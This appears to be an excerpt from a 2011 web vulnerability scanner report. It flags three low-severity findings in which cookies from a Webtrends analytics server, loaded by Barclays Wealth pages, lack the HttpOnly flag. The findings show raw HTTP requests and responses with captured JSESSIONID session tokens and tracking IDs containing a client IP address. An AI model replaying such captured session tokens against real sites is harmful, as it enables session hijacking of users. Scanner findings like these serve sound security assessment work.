e9a1d8be17ac7c4e82a33f87f30d2454a9bb4bfdb2fbd7483e61a6a0cc5f955742fc6ec1cb515d04b739fb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5fa7b06e8a285cd8557c816bb73a1054dd6f61c085541b14b0f1cdc85bbc6c13104c5d4e138b4441efe4d0df29ac219ca9f33aa597333f06094a72f0b8693f583078ca7a20868390dd09a51f64f9632368b476625a1b97fdeb7fbe3ee2e9f15fc753db61b44d95d1c6d908adf73080ff95a857114d212e9df7fc023f7926c1affcf77ff603dec1e90cc59b840d67c805e76b06755b56dc15c816627f1e4749c07ae4b98253a37795a90f6d2ffd57b3693a6c9d99ecaa3c9a7a2527c08b4dbd7d1ef687965b66d7c1e975c8c4819341ab9128d14f9b1bdee50ad380f57e1607502342b902a0c35352af2b371709e343f483515143f0fc99e12cb86a0b22ab052728728bd3c0c456974ff8bd27744064404e26ad0fccbe513db005298de7110f64ccb4609be6beaa96988e67faccfed7a085828f21c9bea0b2773172bd891771d4d836ccdfffa31f995b8fc42887cb3575827453bccd907351c104cefba115a4bd9ee95130217e8bdfa0cd23ab3116e9c89e3d09b38184a5fe50c93587e762fa74be77fcad2faca5a3666a5599e4a86d7e4ecc7733b506d0fa6cc09cf1a56faa0dc59bfccaa26dd86f48b704209a9012b257d48680e37e775f52dbd038c4b143731ce21cd7914c25b15db25224b3bee5373935f185a89d99254f340d0f11ef6b280f8fa7d57a97bf7dff879d0253f5789af0b4e906e0259ea13157c8af715fefae0a517c4043d0ed61354c4279387ad91fbc67362e5ee491d9b9428d5ab48c026f3da596a3f7140ea7890f9f1807be6793e6641163ac21e4d1318d29893e16c3721d3cb0243980354f494882062679b747f4ca7f6919cb7407796802197808477612c0082bf53eb1a8d28c4b903e4cc0b860aefb0c1b29d53ab33f3cbd0809f1cac8b43fb29fd469fdc6b6ab046e78448d743a93ea6e917e4e43311dabd2011e0744e9affd57dfa06865fb7252769bab308d9291514a338c41bbfe2d3d9c5fe539f021722ba6875a46b9ae61b01352b7bd8133bc0aef41132a2109c99b6de15c83543f0a38fc8db26aad571263c1ddcd13d64d45ea865522576347b3f0d0d044a746f350acb15f7ff8856755a7c3212ab422a680e6ec1ae07755dccf9ed00d5cb749d874ca9a0bd514f81777a17f65d705af40a5d948ae67c37c6c3f9e9a1d8be17ac7c4e82a33f87f30d2454a9bb4bfdb2fbd7483e61a6a0cc5f955742fc6ec1cb515d04b739fb HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/barclays-infinite-credit-card.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=DF89E5BAA7A71BDFFD734919F4B8C6D8; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200988e87; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d04610a68; _wt.mode-79569=fcdcc722e93202c8abcc

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:18 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=4274AF1E58216E26E0C3901397ECB67E; Path=/ots
Set-Cookie: _wt.mode-79569=fcdcc722e932029c8164; Path=/
Set-Cookie: _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2008dfa14; Expires=Sun, 01-Jan-2012 00:02:19 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.35. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5725a79065efa59d13f9854b8ffb4ff341cffa3c6c9da58c217b271a6094a91e104586061876c763ee9b299bde51a0fdfcafe22b51b43b81151e38bd553d9ab12d86842469408e2c25235d69ff48909d6a1a40767224ad1f142eb09b156138703056de3ff2bcdf6bfed885ff56d970342c76a45c00c442ea6aafb451028e858ac6409ca0ea7ba1aa3549cfe1f7c9fcb1eb83a6dac42c0a61ffc049613d21d3baf2c09e51a9d1cda3830fff136da5cfa5d813450463c1ecda7d2e9d53971c4e5be8dd29cf8d8aab3083f4ee0cececa81041e15c81f6d158200d1530d2e73c856ca48afa6bef559bb3f1057f274626e5869d7695f243e3ff6a47b6697323f483515143f0fc99e12cb8abda344d8123fd373a73000456974ff8bd27744065c04e26ad0fcc2f813dc1b5a92d77e13e144dd4f11e933a595458fb03eedba83077f2a47f279e6f61b6874486c0577b8e5  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5725a79065efa59d13f9854b8ffb4ff341cffa3c6c9da58c217b271a6094a91e104586061876c763ee9b299bde51a0fdfcafe22b51b43b81151e38bd553d9ab12d86842469408e2c25235d69ff48909d6a1a40767224ad1f142eb09b156138703056de3ff2bcdf6bfed885ff56d970342c76a45c00c442ea6aafb451028e858ac6409ca0ea7ba1aa3549cfe1f7c9fcb1eb83a6dac42c0a61ffc049613d21d3baf2c09e51a9d1cda3830fff136da5cfa5d813450463c1ecda7d2e9d53971c4e5be8dd29cf8d8aab3083f4ee0cececa81041e15c81f6d158200d1530d2e73c856ca48afa6bef559bb3f1057f274626e5869d7695f243e3ff6a47b6697323f483515143f0fc99e12cb8abda344d8123fd373a73000456974ff8bd27744065c04e26ad0fcc2f813dc1b5a92d77e13e144dd4f11e933a595458fb03eedba83077f2a47f279e6f61b6874486c0577b8e5

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5725a79065efa59d13f9854b8ffb4ff341cffa3c6c9da58c217b271a6094a91e104586061876c763ee9b299bde51a0fdfcafe22b51b43b81151e38bd553d9ab12d86842469408e2c25235d69ff48909d6a1a40767224ad1f142eb09b156138703056de3ff2bcdf6bfed885ff56d970342c76a45c00c442ea6aafb451028e858ac6409ca0ea7ba1aa3549cfe1f7c9fcb1eb83a6dac42c0a61ffc049613d21d3baf2c09e51a9d1cda3830fff136da5cfa5d813450463c1ecda7d2e9d53971c4e5be8dd29cf8d8aab3083f4ee0cececa81041e15c81f6d158200d1530d2e73c856ca48afa6bef559bb3f1057f274626e5869d7695f243e3ff6a47b6697323f483515143f0fc99e12cb8abda344d8123fd373a73000456974ff8bd27744065c04e26ad0fcc2f813dc1b5a92d77e13e144dd4f11e933a595458fb03eedba83077f2a47f279e6f61b6874486c0577b8e5 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/private-banking.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2D0CE6DA7B82936A31CBC9ACE233AAA7; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c73ae63744334ae8cef4967d1912276c4668924ff5e00a6078cb239e3f1b573242cbd9b707a451092fc680a56b548caeb5a3f96f49b427787e772f8662a4191929dc9447c4758dd37c9d02690b0b; _wt.mode-79569=fcdcc722e93200beff43; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00d8b959

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:06 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=74DD24DA05D7E85933AC1283D8E7C849; Path=/ots
Set-Cookie: _wt.mode-79569=fcdcc722e932037bbb78; Path=/
Set-Cookie: _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2003676f9; Expires=Sun, 01-Jan-2012 00:02:06 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.36. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de88e91464e5c4f2e7e8b8e49c8e96f5952759fe24f09ca0f15b409ee09d35f106fda52ad4acb239f08b1b22975f829847a1bb97a632454077f22bd60e9752737af17b7f3a5e043e5fb2b19ff8a2da930eafc40001ec2a2e1a5c6d419b92b42da9e42b3f8727d752a7ce9a85cd79c4290b2689893e191e2335b7ff9456a8b5c025fe8e71214bb19474156af0428dc1727449e476e453c60e8049f6ec158e3a4f7ad2316b8e3d585921f8c1ab82eff410983ea1e4c0447e1091a4989d5e5ca8c772fc585ef589e6c18e5770df3ce9d109fbf1baa4d753cfb7197a13767bfd8e2d14b87f4cf4d29741fbcc70fa847d12576df4a6230a7bc7a88b7fbafe62c9210fd7937a40e46bd53123cbba5ea5c1d28ff40d12e44d110f0e51abe4ff7995c3dc69d0ab6366db646c2a200f4019510c70237ed765ea069c151816824ebe271991eaa46942e372f675b93f7c7e6ce3167cde2a18dc885e9b4c2f552631ff3c3d9c2960d170dd71e70158604df5f0c2f7dde51db55baccd8b915ee6a1c5cf269621d2543fc71496b7e3ffda879669731204e331d1a320ec6881bd399bff46fea0438cc32a9287d033f76a8a7e8701d5c1f13ee71c3e8d1ad16894b54c88e7314ad41c24c59ac72a9c003ccf770fd89b5395b4934e127f6f94f7a6b037099986d18478b6dc0f0f36bf5c5f5fe5a8c66f64651775328d7c610525e5052bab44c1d0bd0b68e465a46edb0ee4d8356b64518d9cbbec8b3655f2b48b94a95785d2c39f90fb7739cd2ff9a0e3660f30e994fd584eae897713e063a0df69a09ce1654f6a18a0cecc5a9248fdbf48379130dff507b252a176f0d66b076f42de6098b1a423561c574c47147c00610db74751a6fe0032791554f56dadec65bf44580f546f7b882f6a82759fd2fa38cac2dd7723455dfa0584cc56f0149f2047c69c9ea12a2a6a1ef409f1a6e0687105c8f37c7b9aac58e856536ff95100fab837590a86be078b3861a39337049be29c6faa1d62be77f6e36471033c044121d4fd391c2e43b6777d3c8165f8c3f17b68c8077343784267e1aa2fad295a01720c88b24c4dbd275602c0582b75ce24a8a73c3f816a0a349ca42a8f596f1d557a165f2cbcbdf8e4dabdd45a82efa46cb8c3a6ce346e4d71cd914f969fde916b0e36614d9ed7c40b0201b9efd832ffb008205b62a2e6bb8b20a88781f15f53ac31de2e5878acdfe5392531b70bc3974a43dc4e11f55607a2a8d196bc5f8f84766a613c8cab4dc11c8304ef3a0888bc33091c4333065178b822662db58fc6d442936657e385a59001e73383f019d1cf3ae800d795f74760bbf701d0f790be7ed5931019cbdf149cb04701d25  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de88e91464e5c4f2e7e8b8e49c8e96f5952759fe24f09ca0f15b409ee09d35f106fda52ad4acb239f08b1b22975f829847a1bb97a632454077f22bd60e9752737af17b7f3a5e043e5fb2b19ff8a2da930eafc40001ec2a2e1a5c6d419b92b42da9e42b3f8727d752a7ce9a85cd79c4290b2689893e191e2335b7ff9456a8b5c025fe8e71214bb19474156af0428dc1727449e476e453c60e8049f6ec158e3a4f7ad2316b8e3d585921f8c1ab82eff410983ea1e4c0447e1091a4989d5e5ca8c772fc585ef589e6c18e5770df3ce9d109fbf1baa4d753cfb7197a13767bfd8e2d14b87f4cf4d29741fbcc70fa847d12576df4a6230a7bc7a88b7fbafe62c9210fd7937a40e46bd53123cbba5ea5c1d28ff40d12e44d110f0e51abe4ff7995c3dc69d0ab6366db646c2a200f4019510c70237ed765ea069c151816824ebe271991eaa46942e372f675b93f7c7e6ce3167cde2a18dc885e9b4c2f552631ff3c3d9c2960d170dd71e70158604df5f0c2f7dde51db55baccd8b915ee6a1c5cf269621d2543fc71496b7e3ffda879669731204e331d1a320ec6881bd399bff46fea0438cc32a9287d033f76a8a7e8701d5c1f13ee71c3e8d1ad16894b54c88e7314ad41c24c59ac72a9c003ccf770fd89b5395b4934e127f6f94f7a6b037099986d18478b6dc0f0f36bf5c5f5fe5a8c66f64651775328d7c610525e5052bab44c1d0bd0b68e465a46edb0ee4d8356b64518d9cbbec8b3655f2b48b94a95785d2c39f90fb7739cd2ff9a0e3660f30e994fd584eae897713e063a0df69a09ce1654f6a18a0cecc5a9248fdbf48379130dff507b252a176f0d66b076f42de6098b1a423561c574c47147c00610db74751a6fe0032791554f56dadec65bf44580f546f7b882f6a82759fd2fa38cac2dd7723455dfa0584cc56f0149f2047c69c9ea12a2a6a1ef409f1a6e0687105c8f37c7b9aac58e856536ff95100fab837590a86be078b3861a39337049be29c6faa1d62be77f6e36471033c044121d4fd391c2e43b6777d3c8165f8c3f17b68c8077343784267e1aa2fad295a01720c88b24c4dbd275602c0582b75ce24a8a73c3f816a0a349ca42a8f596f1d557a165f2cbcbdf8e4dabdd45a82efa46cb8c3a6ce346e4d71cd914f969fde916b0e36614d9ed7c40b0201b9efd832ffb008205b62a2e6bb8b20a88781f15f53ac31de2e5878acdfe5392531b70bc3974a43dc4e11f55607a2a8d196bc5f8f84766a613c8cab4dc11c8304ef3a0888bc33091c4333065178b822662db58fc6d442936657e385a59001e73383f019d1cf3ae800d795f74760bbf701d0f790be7ed5931019cbdf149cb04701d25

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de88e91464e5c4f2e7e8b8e49c8e96f5952759fe24f09ca0f15b409ee09d35f106fda52ad4acb239f08b1b22975f829847a1bb97a632454077f22bd60e9752737af17b7f3a5e043e5fb2b19ff8a2da930eafc40001ec2a2e1a5c6d419b92b42da9e42b3f8727d752a7ce9a85cd79c4290b2689893e191e2335b7ff9456a8b5c025fe8e71214bb19474156af0428dc1727449e476e453c60e8049f6ec158e3a4f7ad2316b8e3d585921f8c1ab82eff410983ea1e4c0447e1091a4989d5e5ca8c772fc585ef589e6c18e5770df3ce9d109fbf1baa4d753cfb7197a13767bfd8e2d14b87f4cf4d29741fbcc70fa847d12576df4a6230a7bc7a88b7fbafe62c9210fd7937a40e46bd53123cbba5ea5c1d28ff40d12e44d110f0e51abe4ff7995c3dc69d0ab6366db646c2a200f4019510c70237ed765ea069c151816824ebe271991eaa46942e372f675b93f7c7e6ce3167cde2a18dc885e9b4c2f552631ff3c3d9c2960d170dd71e70158604df5f0c2f7dde51db55baccd8b915ee6a1c5cf269621d2543fc71496b7e3ffda879669731204e331d1a320ec6881bd399bff46fea0438cc32a9287d033f76a8a7e8701d5c1f13ee71c3e8d1ad16894b54c88e7314ad41c24c59ac72a9c003ccf770fd89b5395b4934e127f6f94f7a6b037099986d18478b6dc0f0f36bf5c5f5fe5a8c66f64651775328d7c610525e5052bab44c1d0bd0b68e465a46edb0ee4d8356b64518d9cbbec8b3655f2b48b94a95785d2c39f90fb7739cd2ff9a0e3660f30e994fd584eae897713e063a0df69a09ce1654f6a18a0cecc5a9248fdbf48379130dff507b252a176f0d66b076f42de6098b1a423561c574c47147c00610db74751a6fe0032791554f56dadec65bf44580f546f7b882f6a82759fd2fa38cac2dd7723455dfa0584cc56f0149f2047c69c9ea12a2a6a1ef409f1a6e0687105c8f37c7b9aac58e856536ff95100fab837590a86be078b3861a39337049be29c6faa1d62be77f6e36471033c044121d4fd391c2e43b6777d3c8165f8c3f17b68c8077343784267e1aa2fad295a01720c88b24c4dbd275602c0582b75ce24a8a73c3f816a0a349ca42a8f596f1d557a165f2cbcbdf8e4dabdd45a82efa46cb8c3a6ce346e4d71cd914f969fde916b0e36614d9ed7c40b0201b9efd832ffb008205b62a2e6bb8b20a88781f15f53ac31de2e5878acdfe5392531b70bc3974a43dc4e11f55607a2a8d196bc5f8f84766a613c8cab4dc11c8304ef3a0888bc33091c4333065178b822662db58fc6d442936657e385a59001e73383f019d1cf3ae800d795f74760bbf701d0f790be7ed5931019cbdf149cb04701d25 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/about-us/corporate-social-responsibility.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=93530B2177889BE5371E306CA55F4229; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2008dfa14; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d042f457f; _wt.mode-79569=fcdcc722e93202d188d0

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:06 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=27DB104FF240B21CA30EC91928AC60D3; Path=/ots
Set-Cookie: _wt.mode-79569=fcdcc722e93201f611e1; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a059683f7; Expires=Sun, 01-Jan-2012 00:03:06 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.37. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392deb9e91585f035b3a35cd925087e761247a6fade9720dc2253cb41cf81885470770d955ab4acb239f14bfe72a4ddb25c56203f36663201e127f7abd60b0392424be18baebafe451e1f63305b9c721ab72a4f74205059da3f3e4d19602a7225fc98746eae27270322364a9f84488ce4e91ae6a939ffedaac315747c9771ba2317479c1dd3522b852064815ef645eae714a67f92f1921145aa35e9969c917e3a6ebf92c40e9f7d28cc04e8342ff3ffd2a1b9ff93d33774ca86c470dcb92ad9fd92936a0fb8345836e22c11737f2cc991681ac289d7e5302fb55bd9d0f76da89a7890bd6a1a5116a365bcd8654f218c63164de43662abdab3dd6e7bdc7b26cc44bea6d25e04c03fa5d1c6d8d9ced6e153dbe12d125489453b4b100a75e9bf11a679acf19bb2165a14fcba51ffd079714c50820e47d59b96dcb598e652bfceb7a9e07ae5d813450463c1ecda4d2e9d53971c4e5a18dda87fad8acb7133744e9c1cdd1941e797c935a3347970fca5b173a67b9388c0df5e9a5f643b2270f55e16f75083e249b3213372a2ce9ff3c25c571635b2a067c7d42ded35998dabcb622b251729c2aa76f1b4d7a3cebe7ec6451594512ed7f87e2c7f243d24d019d8c7e13ad44c44e